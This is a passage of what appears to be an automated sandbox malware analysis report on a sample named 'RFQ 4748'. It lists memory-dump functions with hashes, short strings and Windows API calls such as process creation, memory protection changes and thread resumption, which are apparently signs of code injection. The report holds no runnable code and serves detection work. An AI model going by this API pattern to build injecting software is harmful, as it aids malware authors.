                                                              • Instruction ID: 8740aed09acf3a733b41f5825f99822bc58803a73b981252664c0ca3d527289d
                                                              • Opcode Fuzzy Hash: aabfd71ff3788f6cbfbb9477279e13297a0af48d423641bd4b403bb1c87fbf73
                                                              • Instruction Fuzzy Hash: 682171709053489FCB50EFAAD844AEFFBF9EF49314F518429D41967251CB39A844CFA1
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06AD8809
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 30f02295f54b180c87bdfc97fd7c790d55bb5c2d5f72efaae6a20e93cf35637c
                                                              • Instruction ID: 1dbdb9a02c2c93b3ad7ece7befdcbc4d9d69a1f963a4483e62e9f9701946d1a4
                                                              • Opcode Fuzzy Hash: 30f02295f54b180c87bdfc97fd7c790d55bb5c2d5f72efaae6a20e93cf35637c
                                                              • Instruction Fuzzy Hash: 0521E6B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C779A940CBA1
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 67b893b367243e2b27fa8ccce624ce79c1c84a5c1e2dd65ecb268c596d561dad
                                                              • Instruction ID: d0f5a9b07ae945a451329cf3d86dfa7ee53393a3734b4ccd168652d6ab9a3550
                                                              • Opcode Fuzzy Hash: 67b893b367243e2b27fa8ccce624ce79c1c84a5c1e2dd65ecb268c596d561dad
                                                              • Instruction Fuzzy Hash: 9921F7B1D006089EDB14DFAAC844AEFFBF9FF49324F508429D519A7250CB78A945CFA1
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a0231a9ddf52b60bab84f1d27b41af1fff7f83a2db46a3b92198ecbbf29e7765
                                                              • Instruction ID: cfef3e6297d0bb06d9e4c565d2e1745880db46ec8f990a576eee9b866903f466
                                                              • Opcode Fuzzy Hash: a0231a9ddf52b60bab84f1d27b41af1fff7f83a2db46a3b92198ecbbf29e7765
                                                              • Instruction Fuzzy Hash: 9411E7B1D002498EDB14DFAAC4846AFFBF5FF49314F50842AD419A7250CB78A945CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PH]q
                                                              • API String ID: 0-3168235125
                                                              • Opcode ID: 3aafcbf6888822663b513da9c342e20097495a9abab3b291720795483cfbaab9
                                                              • Instruction ID: 4d94b5ac7260610240b0f1b42f8150e3e0b672994d4e1afb430f12aff804459c
                                                              • Opcode Fuzzy Hash: 3aafcbf6888822663b513da9c342e20097495a9abab3b291720795483cfbaab9
                                                              • Instruction Fuzzy Hash: 29D11874E04358CFEBA8EF69D48479DBBB2FB89304F2090AAC449AB354DB745985CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: df42ee67012d49d57d533d1fa0d819b46475d5552adaa6fc6b2306624af62d82
                                                              • Instruction ID: a6be86c60cfdc511a145ce04333323f24ebda2fd83bffd278df45ed6e954a752
                                                              • Opcode Fuzzy Hash: df42ee67012d49d57d533d1fa0d819b46475d5552adaa6fc6b2306624af62d82
                                                              • Instruction Fuzzy Hash: 4FB1C8B4E06218CFEB94DFA9E98479DBBF2FF49300F1080A9D409AB255DB755985CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 61ba703eda319876fd9c859ac80fc7d8443580325c024527fe0e28c2e5fde370
                                                              • Instruction ID: ab17bcb88b5da9c546b51555dfd13a773591fab28b6ecdec3e76af9c311a7a71
                                                              • Opcode Fuzzy Hash: 61ba703eda319876fd9c859ac80fc7d8443580325c024527fe0e28c2e5fde370
                                                              • Instruction Fuzzy Hash: 1CB1C7B4E06218CFEB94DFA9E98479DBBF2FF49300F1080A9D409AB255DB755985CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: e48e5782115c9773b3c44ef32a2b9d2bf7f29f975274813420d90842ba3aee49
                                                              • Instruction ID: dc0a6184aa21b403acb7a30d60b2d1f0580527d4a4dcc91d801e5d36f5e66ebf
                                                              • Opcode Fuzzy Hash: e48e5782115c9773b3c44ef32a2b9d2bf7f29f975274813420d90842ba3aee49
                                                              • Instruction Fuzzy Hash: 12915674E01218CFEB50EFA9D484BADBBB2FB8A300F10816AD40AA7355DB355D85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: dff442fa5825011c60e9cfbae50b245992d6d6697d7eb132fafc33e863b2a03c
                                                              • Instruction ID: 447e3970e805b01b9d38994152f6d7c438547a06007f8fd53b8a3eff421a68cd
                                                              • Opcode Fuzzy Hash: dff442fa5825011c60e9cfbae50b245992d6d6697d7eb132fafc33e863b2a03c
                                                              • Instruction Fuzzy Hash: 22914574E05218CFEB50EFA9D4887ADBBB2FB8A310F10816AD40AA7355DB345D85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d06a9153a783e54086bfb9271dcb5feb586aff77bea525e346d247b4d349bcf
                                                              • Instruction ID: 1f1b3c0f211ae50e66b3c07d0513dfbc2ad4317fb71e52c258a4d03b4aee9ba1
                                                              • Opcode Fuzzy Hash: 1d06a9153a783e54086bfb9271dcb5feb586aff77bea525e346d247b4d349bcf
                                                              • Instruction Fuzzy Hash: AD92ABB4A24209CFD711DF19D688AA9BBF1FB04324F55C1A9D1059F266D3BAEC84CF42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8ca2de87be9e242f29e27003bdd8db16ea24fef8a1ac14b8f222599c49ccfd2
                                                              • Instruction ID: bace70bfe13191be02700354bffad74b1871c1763b79c141103fdf1ff9c5ab8b
                                                              • Opcode Fuzzy Hash: a8ca2de87be9e242f29e27003bdd8db16ea24fef8a1ac14b8f222599c49ccfd2
                                                              • Instruction Fuzzy Hash: 745282B4A046298FCB64EF28C984B9AB7B6FF89301F1081D9D54DA7355DB30AE81CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edd829f8726c23d460c303ac443cd5a39b60af5eeb8ff6c0edf796d8a193c404
                                                              • Instruction ID: 09268b2d03d8a043f562d0f02fe4282580e53e6fec9d8cb8f4019e2288a611af
                                                              • Opcode Fuzzy Hash: edd829f8726c23d460c303ac443cd5a39b60af5eeb8ff6c0edf796d8a193c404
                                                              • Instruction Fuzzy Hash: 39F15974E00258DFDB94EFA9D884BADBBF1FF89304F1081AAD049AB295CB345985CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25560d280b5446ff06c41b79c1c7a2cfc58435c6a8c53e0789a21f8019295a3a
                                                              • Instruction ID: 40aee85eee5d38cfd81b00ffe993a7d883760343a2e84495b15b27dd8055de6e
                                                              • Opcode Fuzzy Hash: 25560d280b5446ff06c41b79c1c7a2cfc58435c6a8c53e0789a21f8019295a3a
                                                              • Instruction Fuzzy Hash: D5E13B74E00358DFDB94EFA9D884BADBBF1FB89304F1081AAD049AB295CB345985CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b301203c0fe3576734d2170fb23b0556b487884209077c603d91296caa60e1f
                                                              • Instruction ID: e51a7233b7c6bbf536b21ce360ba60f6b50109dfbbfa928038045c9c4f20d692
                                                              • Opcode Fuzzy Hash: 6b301203c0fe3576734d2170fb23b0556b487884209077c603d91296caa60e1f
                                                              • Instruction Fuzzy Hash: EAE12B74E00358DFDB94EFA9D884BADBBF1FB89304F1081AAD049AB255CB345985CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 712ddd9021329d39630b1b5be6ff0ff0198ec6002bf95049f050cb3fd4d744e4
                                                              • Instruction ID: e7952198349ae2ada12b44d1eef032aab85641fe4bd63b346be32329e7594742
                                                              • Opcode Fuzzy Hash: 712ddd9021329d39630b1b5be6ff0ff0198ec6002bf95049f050cb3fd4d744e4
                                                              • Instruction Fuzzy Hash: 9FE12B74E04358CFDB94EFA9D884BADBBF2FB89304F1081AAD049AB255CB345985CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7269ea9137c4b72ced5d405bfc625dac22e47219959e0224b441822dc95e4719
                                                              • Instruction ID: b0cc26cdaf58012925c5835554dde33cd3258ed6b3e415b2a6e7fe3d5fbbd937
                                                              • Opcode Fuzzy Hash: 7269ea9137c4b72ced5d405bfc625dac22e47219959e0224b441822dc95e4719
                                                              • Instruction Fuzzy Hash: 3AD11974A04258CFDB94EFA8D884BADBBF2FB89304F1091AAD049AB255CB345D85CF01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e29efb23b1e48f475cdbb38c212a936a934b9ace841a9355dd3e2eb78d6542
                                                              • Instruction ID: afde167fa9789df46b7948cedf35d292d3eabe0fb754475acbbda1d21296c772
                                                              • Opcode Fuzzy Hash: d2e29efb23b1e48f475cdbb38c212a936a934b9ace841a9355dd3e2eb78d6542
                                                              • Instruction Fuzzy Hash: 51510B71E01A188BD718DF6BCC8468ABBF3BFC9301F04C1AAD448AB255DB745A85CF50

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$TJbq$TJbq$Te]q
                                                              • API String ID: 0-2582363881
                                                              • Opcode ID: 3217f9b6b04d0c9eab04ddd3a3178c9407901803c7643a79c4395dbfe018e1e5
                                                              • Instruction ID: b6f021e41beb8688d0b5d332c480867cb29df72e4a3036acb1f3036e1e618569
                                                              • Opcode Fuzzy Hash: 3217f9b6b04d0c9eab04ddd3a3178c9407901803c7643a79c4395dbfe018e1e5
                                                              • Instruction Fuzzy Hash: 45E17B74A242058FD708DFA8D494BA9BBF2FF88310F1581AAE546DB7A5CB70DC51CB42

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d%cq$d%cq$$]q$$]q
                                                              • API String ID: 0-2396156113
                                                              • Opcode ID: 2370f42fe1e4d85b230802b4fcb0cc9c0955ac0f25c90b860f2efe2dc64be17e
                                                              • Instruction ID: 588830c71cc8862b64ddf13ef2fd9f5fb81778b5598dae32f54602429715e122
                                                              • Opcode Fuzzy Hash: 2370f42fe1e4d85b230802b4fcb0cc9c0955ac0f25c90b860f2efe2dc64be17e
                                                              • Instruction Fuzzy Hash: 49616B30B103468FC708AB3DDC95B6A7AEABF85710F254A69D502DB7D8DB74DC018791

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: cf7fab160be1ceb3904721f8ff163ff7c1ea1a75c2a4c50b6bdc5c24253daf15
                                                              • Instruction ID: 4a99b0f66df49ea2836315c50a0329d857868c80aa7f7fbc0194fdaa1c047181
                                                              • Opcode Fuzzy Hash: cf7fab160be1ceb3904721f8ff163ff7c1ea1a75c2a4c50b6bdc5c24253daf15
                                                              • Instruction Fuzzy Hash: CEB092A281E3C4CFC7025E9888E20607F60AA7204035EC1E6C8994E987E1658A86E362

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq$Haq
                                                              • API String ID: 0-3013282719
                                                              • Opcode ID: b6833f90e9e290a29cd0cd7f833b2f9a5d22d45ad9aec90bce522dc91aa2888b
                                                              • Instruction ID: 01c90eb22b32d499a31a0c45b9624b819c8f5f5c821ebdcf8129248f6143c76a
                                                              • Opcode Fuzzy Hash: b6833f90e9e290a29cd0cd7f833b2f9a5d22d45ad9aec90bce522dc91aa2888b
                                                              • Instruction Fuzzy Hash: 9A027D30A002059FCB65EFA5D894AAEBBF6FF88300F108529D5469B394DB35EC46CB90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$4']q
                                                              • API String ID: 0-705557208
                                                              • Opcode ID: 47b669215e96b057c1a853b687d912e5293f60f5cd53527799b88c25332a93c9
                                                              • Instruction ID: 904e81314b05b173f881e7172c0d37b3fb722fef515b475895a04dafb9e00c57
                                                              • Opcode Fuzzy Hash: 47b669215e96b057c1a853b687d912e5293f60f5cd53527799b88c25332a93c9
                                                              • Instruction Fuzzy Hash: 48F1DD34A10218DFCB44EFA4D998A9DB7B2FF89305F118159E505AB3A5DB71EC42CF90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$(aq$Haq
                                                              • API String ID: 0-2456560092
                                                              • Opcode ID: 03da4793046a114edbab0376efdece5505780a5e0a51ebf4aa424332b2ae7dab
                                                              • Instruction ID: df760d5a7207d285cf054fd78f0789520701b300990da545d8e04f07b2600cbe
                                                              • Opcode Fuzzy Hash: 03da4793046a114edbab0376efdece5505780a5e0a51ebf4aa424332b2ae7dab
                                                              • Instruction Fuzzy Hash: 7DE15234A01209DFCB44EF64D5949AEBBB6FF89300F118569E816AB365DF30EC42CB95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              • Opcode ID: 4b708d1eed240f8d8263791f718fc366e2fb6ea37dc3f34a4d4b7d8fd415f657
                                                              • Instruction ID: b8ea7e6dad453d97619a2d1732a291e85acd697edb37453cc0906c4b28919752
                                                              • Opcode Fuzzy Hash: 4b708d1eed240f8d8263791f718fc366e2fb6ea37dc3f34a4d4b7d8fd415f657
                                                              • Instruction Fuzzy Hash: 4E42B274E0020ACFDB94EB94D998ABEB7B6FF89311F11842AD9126B354C7345E46CF90

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              • Opcode ID: 5a30a69c565876bf6a21e1b47bf8ff8fd9ff36ced94fcad57be4404297afb76c
                                                              • Instruction ID: 05025160caea83086ab809ff54b104d80cac0a8e2591daa597bad73490ada12b
                                                              • Opcode Fuzzy Hash: 5a30a69c565876bf6a21e1b47bf8ff8fd9ff36ced94fcad57be4404297afb76c
                                                              • Instruction Fuzzy Hash: FCF1D334D11209DFDBA4EFA4E5986ACBBB6FF89311F21412AE906AB350DB315985CF40

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$Haq
                                                              • API String ID: 0-3785302501
                                                              • Opcode ID: 0ed53544b012eafa4e8281adc336401c86c809b47f9c2106b2350ef36daa0240
                                                              • Instruction ID: 2fc3c612af340731f820d24462d1af83f241b379858df0f6cb4a26df761e55cc
                                                              • Opcode Fuzzy Hash: 0ed53544b012eafa4e8281adc336401c86c809b47f9c2106b2350ef36daa0240
                                                              • Instruction Fuzzy Hash: A7519D30B002158FD799AF39D898A6EBBAAEF99301B11446CD9068B390DF35DD42CB95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /$?
                                                              • API String ID: 0-2346587220
                                                              • Opcode ID: 3f630b3196853aad9b554b43fcf9f444649eed4639b516dbc3a8b35bf84afb20
                                                              • Instruction ID: d3916d5699e6f402cf56bfec5c484db0db52191539fee96911d9534c7eeaac75
                                                              • Opcode Fuzzy Hash: 3f630b3196853aad9b554b43fcf9f444649eed4639b516dbc3a8b35bf84afb20
                                                              • Instruction Fuzzy Hash: 2141CE7490522CCFDB64DF24D898BE8BBB2BB09344F1095EAD90AB7280CB345E85CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $E
                                                              • API String ID: 0-810732363
                                                              • Opcode ID: 76c16dc08fc988ba2d730fd95eae0b5c6181e756236347d7d2a86a7cafd943cd
                                                              • Instruction ID: 278ce7293101604d66adfac59c120ff194de60f135b9093c062555d02ac6f7fa
                                                              • Opcode Fuzzy Hash: 76c16dc08fc988ba2d730fd95eae0b5c6181e756236347d7d2a86a7cafd943cd
                                                              • Instruction Fuzzy Hash: D541DF74905229CFDBA0DF64D988BE9BBB2FB49314F1085EAD809B7240DB359E85CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,$6
                                                              • API String ID: 0-4030993065
                                                              • Opcode ID: bea1535c2d8bd085493d2134658c9eef7393c5eb2de5b4d3d6f14bcf7fd13bce
                                                              • Instruction ID: 5030174e994936bb0d5aa2cbb27c140b149a3651823293a044cfaf8352c7b83f
                                                              • Opcode Fuzzy Hash: bea1535c2d8bd085493d2134658c9eef7393c5eb2de5b4d3d6f14bcf7fd13bce
                                                              • Instruction Fuzzy Hash: 5531BF74906228CFDB64CF65D948BE8BBB2FB05394F5095EAD909B3280C7395E89CF14
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq
                                                              • API String ID: 0-3092978723
                                                              • Opcode ID: b692d658dfc8c8f6b305438b716294c7ead41d5b125986ff6cd26dc0a4e39fed
                                                              • Instruction ID: 8882854ba5363f122bb7ce11d60a07185a7a99450d342dcf9ed078066b7de930
                                                              • Opcode Fuzzy Hash: b692d658dfc8c8f6b305438b716294c7ead41d5b125986ff6cd26dc0a4e39fed
                                                              • Instruction Fuzzy Hash: 49522975A002288FDB64DF68C994BDDBBF6BF88300F1541D9E549AB361DA309E81CF61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (_]q
                                                              • API String ID: 0-188044275
                                                              • Opcode ID: 53ff62b477745a88cc4d56d157359cc68c241353df0da2df55f27f6ae400cfee
                                                              • Instruction ID: 32476e326e06dac3ede056acb6c6aa0ab9a7acd33572098a9b1d535d36c4c417
                                                              • Opcode Fuzzy Hash: 53ff62b477745a88cc4d56d157359cc68c241353df0da2df55f27f6ae400cfee
                                                              • Instruction Fuzzy Hash: C6227C35A102059FDB14DFA9D494AADBBB2BF88300F158569EA45EF3A1CB71EC41CB90
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06AD93CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1ffa34a41ad110e32827da52f005373312a59849f2679aae213868e29aeb296e
                                                              • Instruction ID: f6892c04f693cac6bf9725f8a4e6600328866f3e1cf77bae9f5e58bfb4689f7a
                                                              • Opcode Fuzzy Hash: 1ffa34a41ad110e32827da52f005373312a59849f2679aae213868e29aeb296e
                                                              • Instruction Fuzzy Hash: DC8138B1D002599FDB50EFA9C8817EEBBF5BF48314F148529E85AAB280D7749881CB91
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06AD93CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 78f8ef5bd5d8fb15c0115ac414c7692f15c90e7c99c4a081977303e7970ffd9a
                                                              • Instruction ID: cc62c2c2e88709015712a52261f70b709c41d0db53a93a68750307e303f6b722
                                                              • Opcode Fuzzy Hash: 78f8ef5bd5d8fb15c0115ac414c7692f15c90e7c99c4a081977303e7970ffd9a
                                                              • Instruction Fuzzy Hash: 3B8128B1D002599FDB50EFA9C8817EEBBF1BF48314F148529E85AAB284D774D881CB81
                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06ADB1E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: 37d149193fc22ff286cd5fc9b973c78f7d2a126458ea7efcf9990c4b9f25e02b
                                                              • Instruction ID: 8819ca776220de30a40a8b69d1718ac1c3b3aa229589aeba525f060dac916f70
                                                              • Opcode Fuzzy Hash: 37d149193fc22ff286cd5fc9b973c78f7d2a126458ea7efcf9990c4b9f25e02b
                                                              • Instruction Fuzzy Hash: D6518CB1D002599FDB50EFA9C8857EEBBF2FF48314F158529E816AB280D7749841CBA1
